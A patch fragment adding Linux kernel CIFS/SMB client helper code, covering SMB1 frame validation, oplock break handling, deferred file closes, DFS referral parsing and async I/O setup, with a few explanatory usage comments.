++	buffer->Pid = cpu_to_le16((__u16)current->tgid);
++	buffer->PidHigh = cpu_to_le16((__u16)(current->tgid >> 16));
++	if (treeCon) {
++		buffer->Tid = treeCon->tid;
++		if (treeCon->ses) {
++			if (treeCon->ses->capabilities & CAP_UNICODE)
++				buffer->Flags2 |= SMBFLG2_UNICODE;
++			if (treeCon->ses->capabilities & CAP_STATUS32)
++				buffer->Flags2 |= SMBFLG2_ERR_STATUS;
++
++			/* Uid is not converted */
++			buffer->Uid = treeCon->ses->Suid;
++			if (treeCon->ses->server)
++				buffer->Mid = get_next_mid(treeCon->ses->server);
++		}
++		if (treeCon->Flags & SMB_SHARE_IS_IN_DFS)
++			buffer->Flags2 |= SMBFLG2_DFS;
++		if (treeCon->nocase)
++			buffer->Flags  |= SMBFLG_CASELESS;
++		if ((treeCon->ses) && (treeCon->ses->server))
++			if (treeCon->ses->server->sign)
++				buffer->Flags2 |= SMBFLG2_SECURITY_SIGNATURE;
++	}
++
++	/* endian conversion of flags is now done just before sending */
++	buffer->WordCount = (char) word_count;
++	return;
++}
++
++static int
++check_smb_hdr(struct smb_hdr *smb)
++{
++	/* does it have the right SMB "signature" ? */
++	if (*(__le32 *) smb->Protocol != cpu_to_le32(0x424d53ff)) {
++		cifs_dbg(VFS, "Bad protocol string signature header 0x%x\n",
++			 *(unsigned int *)smb->Protocol);
++		return 1;
++	}
++
++	/* if it's a response then accept */
++	if (smb->Flags & SMBFLG_RESPONSE)
++		return 0;
++
++	/* only one valid case where server sends us request */
++	if (smb->Command == SMB_COM_LOCKING_ANDX)
++		return 0;
++
++	cifs_dbg(VFS, "Server sent request, not response. mid=%u\n",
++		 get_mid(smb));
++	return 1;
++}
++
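++/*
++ * Sanity check a received SMB1 frame: verify the minimum length, the
++ * protocol signature, and that the RFC1001 length field matches both the
++ * amount of data read and the length calculated from the SMB contents
++ * (allowing for known server quirks such as bcc wrap on large reads and
++ * up to 512 bytes of trailing data).
++ */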
++int
++checkSMB(char *buf, unsigned int total_read, struct TCP_Server_Info *server)
++{
++	struct smb_hdr *smb = (struct smb_hdr *)buf;
++	__u32 rfclen = be32_to_cpu(smb->smb_buf_length);
++	__u32 clc_len;  /* calculated length */
++	cifs_dbg(FYI, "checkSMB Length: 0x%x, smb_buf_length: 0x%x\n",
++		 total_read, rfclen);
++
++	/* is this frame too small to even get to a BCC? */
++	if (total_read < 2 + sizeof(struct smb_hdr)) {
++		if ((total_read >= sizeof(struct smb_hdr) - 1)
++			    && (smb->Status.CifsError != 0)) {
++			/* it's an error return */
++			smb->WordCount = 0;
++			/* some error cases do not return wct and bcc */
++			return 0;
++		} else if ((total_read == sizeof(struct smb_hdr) + 1) &&
++				(smb->WordCount == 0)) {
++			char *tmp = (char *)smb;
++			/* Need to work around a bug in two servers here */
++			/* First, check if the part of bcc they sent was zero */
++			if (tmp[sizeof(struct smb_hdr)] == 0) {
++				/* some servers return only half of bcc
++				 * on simple responses (wct, bcc both zero);
++				 * in particular we have seen this on
++				 * ulogoffX and FindClose. This leaves
++				 * one byte of bcc potentially uninitialized
++				 */
++				/* zero rest of bcc */
++				tmp[sizeof(struct smb_hdr)+1] = 0;
++				return 0;
++			}
++			cifs_dbg(VFS, "rcvd invalid byte count (bcc)\n");
++		} else {
++			cifs_dbg(VFS, "Length less than smb header size\n");
++		}
++		return -EIO;
++	}
++
++	/* otherwise, there is enough to get to the BCC */
++	if (check_smb_hdr(smb))
++		return -EIO;
++	clc_len = smbCalcSize(smb);
++
++	if (4 + rfclen != total_read) {
++		cifs_dbg(VFS, "Length read does not match RFC1001 length %d\n",
++			 rfclen);
++		return -EIO;
++	}
++
++	if (4 + rfclen != clc_len) {
++		__u16 mid = get_mid(smb);
++		/* check if bcc wrapped around for large read responses */
++		if ((rfclen > 64 * 1024) && (rfclen > clc_len)) {
++			/* check if lengths match mod 64K */
++			if (((4 + rfclen) & 0xFFFF) == (clc_len & 0xFFFF))
++				return 0; /* bcc wrapped */
++		}
++		cifs_dbg(FYI, "Calculated size %u vs length %u mismatch for mid=%u\n",
++			 clc_len, 4 + rfclen, mid);
++
++		if (4 + rfclen < clc_len) {
++			cifs_dbg(VFS, "RFC1001 size %u smaller than SMB for mid=%u\n",
++				 rfclen, mid);
++			return -EIO;
++		} else if (rfclen > clc_len + 512) {
++			/*
++			 * Some servers (Windows XP in particular) send more
++			 * data than the lengths in the SMB packet would
++			 * indicate on certain calls (byte range locks and
++			 * trans2 find first calls in particular). While the
++			 * client can handle such a frame by ignoring the
++			 * trailing data, we choose to limit the amount of extra
++			 * data to 512 bytes.
++			 */
++			cifs_dbg(VFS, "RFC1001 size %u more than 512 bytes larger than SMB for mid=%u\n",
++				 rfclen, mid);
++			return -EIO;
++		}
++	}
++	return 0;
++}
++
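++/*
++ * Check whether an incoming frame is a dnotify response or an oplock break
++ * request rather than an ordinary response; for an oplock break, queue the
++ * oplock break worker for the matching open file. Returns true if the
++ * frame was handled here.
++ */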
++bool
++is_valid_oplock_break(char *buffer, struct TCP_Server_Info *srv)
++{
++	struct smb_hdr *buf = (struct smb_hdr *)buffer;
++	struct smb_com_lock_req *pSMB = (struct smb_com_lock_req *)buf;
++	struct TCP_Server_Info *pserver;
++	struct cifs_ses *ses;
++	struct cifs_tcon *tcon;
++	struct cifsInodeInfo *pCifsInode;
++	struct cifsFileInfo *netfile;
++
++	cifs_dbg(FYI, "Checking for oplock break or dnotify response\n");
++	if ((pSMB->hdr.Command == SMB_COM_NT_TRANSACT) &&
++	   (pSMB->hdr.Flags & SMBFLG_RESPONSE)) {
++		struct smb_com_transaction_change_notify_rsp *pSMBr =
++			(struct smb_com_transaction_change_notify_rsp *)buf;
++		struct file_notify_information *pnotify;
++		__u32 data_offset = 0;
++		size_t len = srv->total_read - sizeof(pSMBr->hdr.smb_buf_length);
++
++		if (get_bcc(buf) > sizeof(struct file_notify_information)) {
++			data_offset = le32_to_cpu(pSMBr->DataOffset);
++
++			if (data_offset >
++			    len - sizeof(struct file_notify_information)) {
++				cifs_dbg(FYI, "Invalid data_offset %u\n",
++					 data_offset);
++				return true;
++			}
++			pnotify = (struct file_notify_information *)
++				((char *)&pSMBr->hdr.Protocol + data_offset);
++			cifs_dbg(FYI, "dnotify on %s Action: 0x%x\n",
++				 pnotify->FileName, pnotify->Action);
++			/*   cifs_dump_mem("Rcvd notify Data: ",buf,
++				sizeof(struct smb_hdr)+60); */
++			return true;
++		}
++		if (pSMBr->hdr.Status.CifsError) {
++			cifs_dbg(FYI, "notify err 0x%x\n",
++				 pSMBr->hdr.Status.CifsError);
++			return true;
++		}
++		return false;
++	}
++	if (pSMB->hdr.Command != SMB_COM_LOCKING_ANDX)
++		return false;
++	if (pSMB->hdr.Flags & SMBFLG_RESPONSE) {
++		/*
++		 * No sense logging an error on an invalid handle during an
++		 * oplock break - a harmless race between a close request and
++		 * the oplock break response is expected from time to time
++		 * when writing out large dirty files cached on the client.
++		 */
++		if ((NT_STATUS_INVALID_HANDLE) ==
++		   le32_to_cpu(pSMB->hdr.Status.CifsError)) {
++			cifs_dbg(FYI, "Invalid handle on oplock break\n");
++			return true;
++		} else if (ERRbadfid ==
++		   le16_to_cpu(pSMB->hdr.Status.DosError.Error)) {
++			return true;
++		} else {
++			return false; /* on valid oplock brk we get "request" */
++		}
++	}
++	if (pSMB->hdr.WordCount != 8)
++		return false;
++
++	cifs_dbg(FYI, "oplock type 0x%x level 0x%x\n",
++		 pSMB->LockType, pSMB->OplockLevel);
++	if (!(pSMB->LockType & LOCKING_ANDX_OPLOCK_RELEASE))
++		return false;
++
++	/* If server is a channel, select the primary channel */
++	pserver = CIFS_SERVER_IS_CHAN(srv) ? srv->primary_server : srv;
++
++	/* look up tcon based on tid & uid */
++	spin_lock(&cifs_tcp_ses_lock);
++	list_for_each_entry(ses, &pserver->smb_ses_list, smb_ses_list) {
++		list_for_each_entry(tcon, &ses->tcon_list, tcon_list) {
++			if (tcon->tid != buf->Tid)
++				continue;
++
++			cifs_stats_inc(&tcon->stats.cifs_stats.num_oplock_brks);
++			spin_lock(&tcon->open_file_lock);
++			list_for_each_entry(netfile, &tcon->openFileList, tlist) {
++				if (pSMB->Fid != netfile->fid.netfid)
++					continue;
++
++				cifs_dbg(FYI, "file id match, oplock break\n");
++				pCifsInode = CIFS_I(d_inode(netfile->dentry));
++
++				set_bit(CIFS_INODE_PENDING_OPLOCK_BREAK,
++					&pCifsInode->flags);
++
++				netfile->oplock_epoch = 0;
++				netfile->oplock_level = pSMB->OplockLevel;
++				netfile->oplock_break_cancelled = false;
++				cifs_queue_oplock_break(netfile);
++
++				spin_unlock(&tcon->open_file_lock);
++				spin_unlock(&cifs_tcp_ses_lock);
++				return true;
++			}
++			spin_unlock(&tcon->open_file_lock);
++			spin_unlock(&cifs_tcp_ses_lock);
++			cifs_dbg(FYI, "No matching file for oplock break\n");
++			return true;
++		}
++	}
++	spin_unlock(&cifs_tcp_ses_lock);
++	cifs_dbg(FYI, "Can not process oplock break for non-existent connection\n");
++	return true;
++}
++
++void
++dump_smb(void *buf, int smb_buf_length)
++{
++	if (traceSMB == 0)
++		return;
++
++	print_hex_dump(KERN_DEBUG, "", DUMP_PREFIX_NONE, 8, 2, buf,
++		       smb_buf_length, true);
++}
++
++void
++cifs_autodisable_serverino(struct cifs_sb_info *cifs_sb)
++{
++	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_SERVER_INUM) {
++		struct cifs_tcon *tcon = NULL;
++
++		if (cifs_sb->master_tlink)
++			tcon = cifs_sb_master_tcon(cifs_sb);
++
++		cifs_sb->mnt_cifs_flags &= ~CIFS_MOUNT_SERVER_INUM;
++		cifs_sb->mnt_cifs_serverino_autodisabled = true;
++		cifs_dbg(VFS, "Autodisabling the use of server inode numbers on %s\n",
++			 tcon ? tcon->tree_name : "new server");
++		cifs_dbg(VFS, "The server doesn't seem to support them properly or the files might be on different servers (DFS)\n");
++		cifs_dbg(VFS, "Hardlinks will not be recognized on this mount. Consider mounting with the \"noserverino\" option to silence this message.\n");
++
++	}
++}
++
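++/* translate an SMB1 oplock level into the local inode caching flags */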
++void cifs_set_oplock_level(struct cifsInodeInfo *cinode, __u32 oplock)
++{
++	oplock &= 0xF;
++
++	if (oplock == OPLOCK_EXCLUSIVE) {
++		cinode->oplock = CIFS_CACHE_WRITE_FLG | CIFS_CACHE_READ_FLG;
++		cifs_dbg(FYI, "Exclusive Oplock granted on inode %p\n",
++			 &cinode->netfs.inode);
++	} else if (oplock == OPLOCK_READ) {
++		cinode->oplock = CIFS_CACHE_READ_FLG;
++		cifs_dbg(FYI, "Level II Oplock granted on inode %p\n",
++			 &cinode->netfs.inode);
++	} else
++		cinode->oplock = 0;
++}
++
++/*
++ * We wait for oplock breaks to be processed before we attempt to perform
++ * writes.
++ */
++int cifs_get_writer(struct cifsInodeInfo *cinode)
++{
++	int rc;
++
++start:
++	rc = wait_on_bit(&cinode->flags, CIFS_INODE_PENDING_OPLOCK_BREAK,
++			 TASK_KILLABLE);
++	if (rc)
++		return rc;
++
++	spin_lock(&cinode->writers_lock);
++	if (!cinode->writers)
++		set_bit(CIFS_INODE_PENDING_WRITERS, &cinode->flags);
++	cinode->writers++;
++	/* Check to see if we have started servicing an oplock break */
++	if (test_bit(CIFS_INODE_PENDING_OPLOCK_BREAK, &cinode->flags)) {
++		cinode->writers--;
++		if (cinode->writers == 0) {
++			clear_bit(CIFS_INODE_PENDING_WRITERS, &cinode->flags);
++			wake_up_bit(&cinode->flags, CIFS_INODE_PENDING_WRITERS);
++		}
++		spin_unlock(&cinode->writers_lock);
++		goto start;
++	}
++	spin_unlock(&cinode->writers_lock);
++	return 0;
++}
++
++void cifs_put_writer(struct cifsInodeInfo *cinode)
++{
++	spin_lock(&cinode->writers_lock);
++	cinode->writers--;
++	if (cinode->writers == 0) {
++		clear_bit(CIFS_INODE_PENDING_WRITERS, &cinode->flags);
++		wake_up_bit(&cinode->flags, CIFS_INODE_PENDING_WRITERS);
++	}
++	spin_unlock(&cinode->writers_lock);
++}
++
++/**
++ * cifs_queue_oplock_break - queue the oplock break handler for cfile
++ * @cfile: The file to break the oplock on
++ *
++ * This function is called from the demultiplex thread when it
++ * receives an oplock break for @cfile.
++ *
++ * Assumes the tcon->open_file_lock is held.
++ * Assumes cfile->file_info_lock is NOT held.
++ */
++void cifs_queue_oplock_break(struct cifsFileInfo *cfile)
++{
++	/*
++	 * Bump the handle refcount now while we hold the
++	 * open_file_lock to enforce the validity of it for the oplock
++	 * break handler. The matching put is done at the end of the
++	 * handler.
++	 */
++	cifsFileInfo_get(cfile);
++
++	queue_work(cifsoplockd_wq, &cfile->oplock_break);
++}
++
++void cifs_done_oplock_break(struct cifsInodeInfo *cinode)
++{
++	clear_bit(CIFS_INODE_PENDING_OPLOCK_BREAK, &cinode->flags);
++	wake_up_bit(&cinode->flags, CIFS_INODE_PENDING_OPLOCK_BREAK);
++}
++
++bool
++backup_cred(struct cifs_sb_info *cifs_sb)
++{
++	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_CIFS_BACKUPUID) {
++		if (uid_eq(cifs_sb->ctx->backupuid, current_fsuid()))
++			return true;
++	}
++	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_CIFS_BACKUPGID) {
++		if (in_group_p(cifs_sb->ctx->backupgid))
++			return true;
++	}
++
++	return false;
++}
++
++void
++cifs_del_pending_open(struct cifs_pending_open *open)
++{
++	spin_lock(&tlink_tcon(open->tlink)->open_file_lock);
++	list_del(&open->olist);
++	spin_unlock(&tlink_tcon(open->tlink)->open_file_lock);
++}
++
++void
++cifs_add_pending_open_locked(struct cifs_fid *fid, struct tcon_link *tlink,
++			     struct cifs_pending_open *open)
++{
++	memcpy(open->lease_key, fid->lease_key, SMB2_LEASE_KEY_SIZE);
++	open->oplock = CIFS_OPLOCK_NO_CHANGE;
++	open->tlink = tlink;
++	fid->pending_open = open;
++	list_add_tail(&open->olist, &tlink_tcon(tlink)->pending_opens);
++}
++
++void
++cifs_add_pending_open(struct cifs_fid *fid, struct tcon_link *tlink,
++		      struct cifs_pending_open *open)
++{
++	spin_lock(&tlink_tcon(tlink)->open_file_lock);
++	cifs_add_pending_open_locked(fid, tlink, open);
++	spin_unlock(&tlink_tcon(open->tlink)->open_file_lock);
++}
++
++/*
++ * Critical section which runs after acquiring deferred_lock.
++ * As there is no reference count on cifs_deferred_close, pdclose
++ * should not be used outside deferred_lock.
++ */
++bool
++cifs_is_deferred_close(struct cifsFileInfo *cfile, struct cifs_deferred_close **pdclose)
++{
++	struct cifs_deferred_close *dclose;
++
++	list_for_each_entry(dclose, &CIFS_I(d_inode(cfile->dentry))->deferred_closes, dlist) {
++		if ((dclose->netfid == cfile->fid.netfid) &&
++			(dclose->persistent_fid == cfile->fid.persistent_fid) &&
++			(dclose->volatile_fid == cfile->fid.volatile_fid)) {
++			*pdclose = dclose;
++			return true;
++		}
++	}
++	return false;
++}
++
++/*
++ * Critical section which runs after acquiring deferred_lock.
++ */
++void
++cifs_add_deferred_close(struct cifsFileInfo *cfile, struct cifs_deferred_close *dclose)
++{
++	bool is_deferred = false;
++	struct cifs_deferred_close *pdclose;
++
++	is_deferred = cifs_is_deferred_close(cfile, &pdclose);
++	if (is_deferred) {
++		kfree(dclose);
++		return;
++	}
++
++	dclose->tlink = cfile->tlink;
++	dclose->netfid = cfile->fid.netfid;
++	dclose->persistent_fid = cfile->fid.persistent_fid;
++	dclose->volatile_fid = cfile->fid.volatile_fid;
++	list_add_tail(&dclose->dlist, &CIFS_I(d_inode(cfile->dentry))->deferred_closes);
++}
++
++/*
++ * Critical section which runs after acquiring deferred_lock.
++ */
++void
++cifs_del_deferred_close(struct cifsFileInfo *cfile)
++{
++	bool is_deferred = false;
++	struct cifs_deferred_close *dclose;
++
++	is_deferred = cifs_is_deferred_close(cfile, &dclose);
++	if (!is_deferred)
++		return;
++	list_del(&dclose->dlist);
++	kfree(dclose);
++}
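++
++/*
++ * Illustrative sketch (not part of this patch): per the comments above, the
++ * deferred-close helpers must run under cinode->deferred_lock, e.g.:
++ *
++ *	spin_lock(&cinode->deferred_lock);
++ *	cifs_del_deferred_close(cfile);
++ *	spin_unlock(&cinode->deferred_lock);
++ */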
++
++void
++cifs_close_deferred_file(struct cifsInodeInfo *cifs_inode)
++{
++	struct cifsFileInfo *cfile = NULL;
++	struct file_list *tmp_list, *tmp_next_list;
++	struct list_head file_head;
++
++	if (cifs_inode == NULL)
++		return;
++
++	INIT_LIST_HEAD(&file_head);
++	spin_lock(&cifs_inode->open_file_lock);
++	list_for_each_entry(cfile, &cifs_inode->openFileList, flist) {
++		if (delayed_work_pending(&cfile->deferred)) {
++			if (cancel_delayed_work(&cfile->deferred)) {
++				spin_lock(&cifs_inode->deferred_lock);
++				cifs_del_deferred_close(cfile);
++				spin_unlock(&cifs_inode->deferred_lock);
++
++				tmp_list = kmalloc(sizeof(struct file_list), GFP_ATOMIC);
++				if (tmp_list == NULL)
++					break;
++				tmp_list->cfile = cfile;
++				list_add_tail(&tmp_list->list, &file_head);
++			}
++		}
++	}
++	spin_unlock(&cifs_inode->open_file_lock);
++
++	list_for_each_entry_safe(tmp_list, tmp_next_list, &file_head, list) {
++		_cifsFileInfo_put(tmp_list->cfile, false, false);
++		list_del(&tmp_list->list);
++		kfree(tmp_list);
++	}
++}
++
++void
++cifs_close_all_deferred_files(struct cifs_tcon *tcon)
++{
++	struct cifsFileInfo *cfile;
++	struct file_list *tmp_list, *tmp_next_list;
++	struct list_head file_head;
++
++	INIT_LIST_HEAD(&file_head);
++	spin_lock(&tcon->open_file_lock);
++	list_for_each_entry(cfile, &tcon->openFileList, tlist) {
++		if (delayed_work_pending(&cfile->deferred)) {
++			if (cancel_delayed_work(&cfile->deferred)) {
++				spin_lock(&CIFS_I(d_inode(cfile->dentry))->deferred_lock);
++				cifs_del_deferred_close(cfile);
++				spin_unlock(&CIFS_I(d_inode(cfile->dentry))->deferred_lock);
++
++				tmp_list = kmalloc(sizeof(struct file_list), GFP_ATOMIC);
++				if (tmp_list == NULL)
++					break;
++				tmp_list->cfile = cfile;
++				list_add_tail(&tmp_list->list, &file_head);
++			}
++		}
++	}
++	spin_unlock(&tcon->open_file_lock);
++
++	list_for_each_entry_safe(tmp_list, tmp_next_list, &file_head, list) {
++		_cifsFileInfo_put(tmp_list->cfile, true, false);
++		list_del(&tmp_list->list);
++		kfree(tmp_list);
++	}
++}
++
++void
++cifs_close_deferred_file_under_dentry(struct cifs_tcon *tcon, const char *path)
++{
++	struct cifsFileInfo *cfile;
++	struct file_list *tmp_list, *tmp_next_list;
++	struct list_head file_head;
++	void *page;
++	const char *full_path;
++
++	INIT_LIST_HEAD(&file_head);
++	page = alloc_dentry_path();
++	spin_lock(&tcon->open_file_lock);
++	list_for_each_entry(cfile, &tcon->openFileList, tlist) {
++		full_path = build_path_from_dentry(cfile->dentry, page);
++		if (strstr(full_path, path)) {
++			if (delayed_work_pending(&cfile->deferred)) {
++				if (cancel_delayed_work(&cfile->deferred)) {
++					spin_lock(&CIFS_I(d_inode(cfile->dentry))->deferred_lock);
++					cifs_del_deferred_close(cfile);
++					spin_unlock(&CIFS_I(d_inode(cfile->dentry))->deferred_lock);
++
++					tmp_list = kmalloc(sizeof(struct file_list), GFP_ATOMIC);
++					if (tmp_list == NULL)
++						break;
++					tmp_list->cfile = cfile;
++					list_add_tail(&tmp_list->list, &file_head);
++				}
++			}
++		}
++	}
++	spin_unlock(&tcon->open_file_lock);
++
++	list_for_each_entry_safe(tmp_list, tmp_next_list, &file_head, list) {
++		_cifsFileInfo_put(tmp_list->cfile, true, false);
++		list_del(&tmp_list->list);
++		kfree(tmp_list);
++	}
++	free_dentry_path(page);
++}
++
++/* Parses a DFS referral V3 structure.
++ * The caller is responsible for freeing target_nodes.
++ * Returns:
++ * - on success - 0
++ * - on failure - errno
++ */
++int
++parse_dfs_referrals(struct get_dfs_referral_rsp *rsp, u32 rsp_size,
++		    unsigned int *num_of_nodes,
++		    struct dfs_info3_param **target_nodes,
++		    const struct nls_table *nls_codepage, int remap,
++		    const char *searchName, bool is_unicode)
++{
++	int i, rc = 0;
++	char *data_end;
++	struct dfs_referral_level_3 *ref;
++
++	*num_of_nodes = le16_to_cpu(rsp->NumberOfReferrals);
++
++	if (*num_of_nodes < 1) {
++		cifs_dbg(VFS, "num_referrals: must be at least > 0, but we get num_referrals = %d\n",
++			 *num_of_nodes);
++		rc = -EINVAL;
++		goto parse_DFS_referrals_exit;
++	}
++
++	ref = (struct dfs_referral_level_3 *) &(rsp->referrals);
++	if (ref->VersionNumber != cpu_to_le16(3)) {
++		cifs_dbg(VFS, "Referrals of V%d version are not supported, should be V3\n",
++			 le16_to_cpu(ref->VersionNumber));
++		rc = -EINVAL;
++		goto parse_DFS_referrals_exit;
++	}
++
++	/* get the upper boundary of the resp buffer */
++	data_end = (char *)rsp + rsp_size;
++
++	cifs_dbg(FYI, "num_referrals: %d dfs flags: 0x%x ...\n",
++		 *num_of_nodes, le32_to_cpu(rsp->DFSFlags));
++
++	*target_nodes = kcalloc(*num_of_nodes, sizeof(struct dfs_info3_param),
++				GFP_KERNEL);
++	if (*target_nodes == NULL) {
++		rc = -ENOMEM;
++		goto parse_DFS_referrals_exit;
++	}
++
++	/* collect necessary data from referrals */
++	for (i = 0; i < *num_of_nodes; i++) {
++		char *temp;
++		int max_len;
++		struct dfs_info3_param *node = (*target_nodes)+i;
++
++		node->flags = le32_to_cpu(rsp->DFSFlags);
++		if (is_unicode) {
++			__le16 *tmp = kmalloc(strlen(searchName)*2 + 2,
++						GFP_KERNEL);
++			if (tmp == NULL) {
++				rc = -ENOMEM;
++				goto parse_DFS_referrals_exit;
++			}
++			cifsConvertToUTF16((__le16 *) tmp, searchName,
++					   PATH_MAX, nls_codepage, remap);
++			node->path_consumed = cifs_utf16_bytes(tmp,
++					le16_to_cpu(rsp->PathConsumed),
++					nls_codepage);
++			kfree(tmp);
++		} else
++			node->path_consumed = le16_to_cpu(rsp->PathConsumed);
++
++		node->server_type = le16_to_cpu(ref->ServerType);
++		node->ref_flag = le16_to_cpu(ref->ReferralEntryFlags);
++
++		/* copy DfsPath */
++		temp = (char *)ref + le16_to_cpu(ref->DfsPathOffset);
++		max_len = data_end - temp;
++		node->path_name = cifs_strndup_from_utf16(temp, max_len,
++						is_unicode, nls_codepage);
++		if (!node->path_name) {
++			rc = -ENOMEM;
++			goto parse_DFS_referrals_exit;
++		}
++
++		/* copy link target UNC */
++		temp = (char *)ref + le16_to_cpu(ref->NetworkAddressOffset);
++		max_len = data_end - temp;
++		node->node_name = cifs_strndup_from_utf16(temp, max_len,
++						is_unicode, nls_codepage);
++		if (!node->node_name) {
++			rc = -ENOMEM;
++			goto parse_DFS_referrals_exit;
++		}
++
++		node->ttl = le32_to_cpu(ref->TimeToLive);
++
++		ref++;
++	}
++
++parse_DFS_referrals_exit:
++	if (rc) {
++		free_dfs_info_array(*target_nodes, *num_of_nodes);
++		*target_nodes = NULL;
++		*num_of_nodes = 0;
++	}
++	return rc;
++}
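++
++/*
++ * Illustrative sketch (not part of this patch): on success the caller owns
++ * the referral array and must free it, e.g.:
++ *
++ *	struct dfs_info3_param *refs = NULL;
++ *	unsigned int nrefs = 0;
++ *
++ *	rc = parse_dfs_referrals(rsp, rsp_size, &nrefs, &refs,
++ *				 nls_codepage, remap, searchName, is_unicode);
++ *	if (!rc)
++ *		free_dfs_info_array(refs, nrefs);
++ */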
++
++struct cifs_aio_ctx *
++cifs_aio_ctx_alloc(void)
++{
++	struct cifs_aio_ctx *ctx;
++
++	/*
++	 * Must use kzalloc to initialize ctx->bv to NULL and ctx->direct_io
++	 * to false so that we know when we have to unreference pages within
++	 * cifs_aio_ctx_release()
++	 */
++	ctx = kzalloc(sizeof(struct cifs_aio_ctx), GFP_KERNEL);
++	if (!ctx)
++		return NULL;
++
++	INIT_LIST_HEAD(&ctx->list);
++	mutex_init(&ctx->aio_mutex);
++	init_completion(&ctx->done);
++	kref_init(&ctx->refcount);
++	return ctx;
++}
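++
++/*
++ * Illustrative sketch (not part of this patch): the context is reference
++ * counted, so callers drop their reference through the release callback
++ * below, e.g.:
++ *
++ *	kref_put(&ctx->refcount, cifs_aio_ctx_release);
++ */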
++
++void
++cifs_aio_ctx_release(struct kref *refcount)
++{
++	struct cifs_aio_ctx *ctx = container_of(refcount,
++					struct cifs_aio_ctx, refcount);
++
++	cifsFileInfo_put(ctx->cfile);
++
++	/*
++	 * ctx->bv is only set if setup_aio_ctx_iter() was called successfully,
++	 * which means that iov_iter_get_pages() succeeded and thus that we
++	 * have taken a reference on the pages.
++	 */
++	if (ctx->bv) {
++		unsigned i;
++
++		for (i = 0; i < ctx->npages; i++) {
++			if (ctx->should_dirty)
++				set_page_dirty(ctx->bv[i].bv_page);
++			put_page(ctx->bv[i].bv_page);
++		}
++		kvfree(ctx->bv);
++	}
++
++	kfree(ctx);
++}
++
++#define CIFS_AIO_KMALLOC_LIMIT (1024 * 1024)
++
++int
++setup_aio_ctx_iter(struct cifs_aio_ctx *ctx, struct iov_iter *iter, int rw)
++{
++	ssize_t rc;
++	unsigned int cur_npages;
++	unsigned int npages = 0;
++	unsigned int i;
++	size_t len;
++	size_t count = iov_iter_count(iter);
++	unsigned int saved_len;
++	size_t start;
++	unsigned int max_pages = iov_iter_npages(iter, INT_MAX);
++	struct page **pages = NULL;
++	struct bio_vec *bv = NULL;
++
++	if (iov_iter_is_kvec(iter)) {
++		memcpy(&ctx->iter, iter, sizeof(*iter));
++		ctx->len = count;
++		iov_iter_advance(iter, count);
++		return 0;
++	}
++
++	if (array_size(max_pages, sizeof(*bv)) <= CIFS_AIO_KMALLOC_LIMIT)
++		bv = kmalloc_array(max_pages, sizeof(*bv), GFP_KERNEL);
++
++	if (!bv) {
++		bv = vmalloc(array_size(max_pages, sizeof(*bv)));
++		if (!bv)
++			return -ENOMEM;
++	}
++
++	if (array_size(max_pages, sizeof(*pages)) <= CIFS_AIO_KMALLOC_LIMIT)
++		pages = kmalloc_array(max_pages, sizeof(*pages), GFP_KERNEL);
++
++	if (!pages) {
++		pages = vmalloc(array_size(max_pages, sizeof(*pages)));
++		if (!pages) {
++			kvfree(bv);
++			return -ENOMEM;
++		}
++	}
++
++	saved_len = count;
++
++	while (count && npages < max_pages) {
++		rc = iov_iter_get_pages2(iter, pages, count, max_pages, &start);
++		if (rc < 0) {
++			cifs_dbg(VFS, "Couldn't get user pages (rc=%zd)\n", rc);
++			break;
++		}
++
++		if (rc > count) {
++			cifs_dbg(VFS, "get pages rc=%zd more than %zu\n", rc,
++				 count);
++			break;
++		}
++
++		count -= rc;
++		rc += start;
++		cur_npages = DIV_ROUND_UP(rc, PAGE_SIZE);
++
++		if (npages + cur_npages > max_pages) {
++			cifs_dbg(VFS, "out of vec array capacity (%u vs %u)\n",
++				 npages + cur_npages, max_pages);
++			break;
++		}
++
++		for (i = 0; i < cur_npages; i++) {
++			len = rc > PAGE_SIZE ? PAGE_SIZE : rc;
++			bv[npages + i].bv_page = pages[i];
++			bv[npages + i].bv_offset = start;
++			bv[npages + i].bv_len = len - start;
++			rc -= len;
++			start = 0;
++		}
++
++		npages += cur_npages;
++	}
++
++	kvfree(pages);
++	ctx->bv = bv;
++	ctx->len = saved_len - count;
++	ctx->npages = npages;
++	iov_iter_bvec(&ctx->iter, rw, ctx->bv, npages, ctx->len);
++	return 0;
++}
++
++/**
++ * cifs_alloc_hash - allocate hash and hash context together
++ * @name: The name of the crypto hash algo
++ * @sdesc: SHASH descriptor where to put the pointer to the hash TFM
++ *
++ * The caller has to make sure @sdesc is initialized to either NULL or
++ * a valid context. It can be freed via cifs_free_hash().
++ */
++int
++cifs_alloc_hash(const char *name, struct shash_desc **sdesc)
++{
++	int rc = 0;
++	struct crypto_shash *alg = NULL;
++
++	if (*sdesc)
++		return 0;
++
++	alg = crypto_alloc_shash(name, 0, 0);
++	if (IS_ERR(alg)) {
++		cifs_dbg(VFS, "Could not allocate shash TFM '%s'\n", name);
++		rc = PTR_ERR(alg);
++		*sdesc = NULL;
++		return rc;
++	}
++
++	*sdesc = kmalloc(sizeof(struct shash_desc) + crypto_shash_descsize(alg), GFP_KERNEL);
++	if (*sdesc == NULL) {
++		cifs_dbg(VFS, "no memory left to allocate shash TFM '%s'\n", name);
++		crypto_free_shash(alg);
++		return -ENOMEM;
++	}
++
++	(*sdesc)->tfm = alg;
++	return 0;
++}
++
++/**
++ * cifs_free_hash - free hash and hash context together
++ * @sdesc: Where to find the pointer to the hash TFM
++ *
++ * Freeing a NULL descriptor is safe.
++ */
++void
++cifs_free_hash(struct shash_desc **sdesc)
++{
++	if (unlikely(!sdesc) || !*sdesc)
++		return;
++
++	if ((*sdesc)->tfm) {
++		crypto_free_shash((*sdesc)->tfm);
++		(*sdesc)->tfm = NULL;
++	}
++
++	kfree_sensitive(*sdesc);
++	*sdesc = NULL;
++}
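++
++/*
++ * Illustrative sketch (not part of this patch): typical pairing of the two
++ * helpers above, with "sha256" as a hypothetical algorithm name:
++ *
++ *	struct shash_desc *sdesc = NULL;
++ *
++ *	rc = cifs_alloc_hash("sha256", &sdesc);
++ *	if (rc)
++ *		return rc;
++ *	... crypto_shash_init/update/final on sdesc ...
++ *	cifs_free_hash(&sdesc);
++ */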
++
++/**
++ * rqst_page_get_length - obtain the length and offset for a page in smb_rqst
++ * @rqst: The request descriptor
++ * @page: The index of the page to query
++ * @len: Where to store the length for this page
++ * @offset: Where to store the offset for this page
++ */
++void rqst_page_get_length(const struct smb_rqst *rqst, unsigned int page,
++			  unsigned int *len, unsigned int *offset)
++{
++	*len = rqst->rq_pagesz;
++	*offset = (page == 0) ? rqst->rq_offset : 0;
++
